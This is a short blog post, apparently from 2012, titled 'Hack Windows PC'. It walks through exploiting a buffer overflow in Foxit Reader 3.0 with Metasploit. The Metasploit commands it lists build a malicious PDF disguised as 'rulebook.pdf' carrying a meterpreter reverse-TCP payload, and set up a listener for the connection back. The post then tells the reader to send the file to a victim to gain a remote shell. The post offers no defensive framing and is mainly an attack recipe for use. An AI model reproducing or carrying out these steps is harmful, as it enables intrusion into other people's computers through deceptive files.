Warung Online
Headlines News :
mas template
Home » , » Hack Windows PC using Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow

Hack Windows PC using Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow

Written By Trik Cari Duit on Selasa, 22 Mei 2012 | 11.29

This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier. Due to the way Foxit Reader handles the input from an "Launch" action, it is possible to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code execution under the context of the user.

Exploit Targets
Foxit Reader 3.0
Windows XP SP2

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/fileformat/foxit_reader_launch
Msf exploit (foxit_reader_launch)>set payload windows/meterpreter/reverse_tcp
Msf exploit (foxit_reader_launch)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (foxit_reader_launch)>set filename rulebook.pdf
Msf exploit (foxit_reader_launch)>exploit


After we successfully generate the malicious PDF File, it will stored on your local computer
/root/.msf4/local/rulebook.pdf


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your rulebook.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


Share this article :

0 komentar:

Speak up your mind

Tell us what you're thinking... !

Bisnis Hot
Bisnis Hot
 


Copyright © . Tips N Trik - All Rights Reserved
Proudly powered by Blogger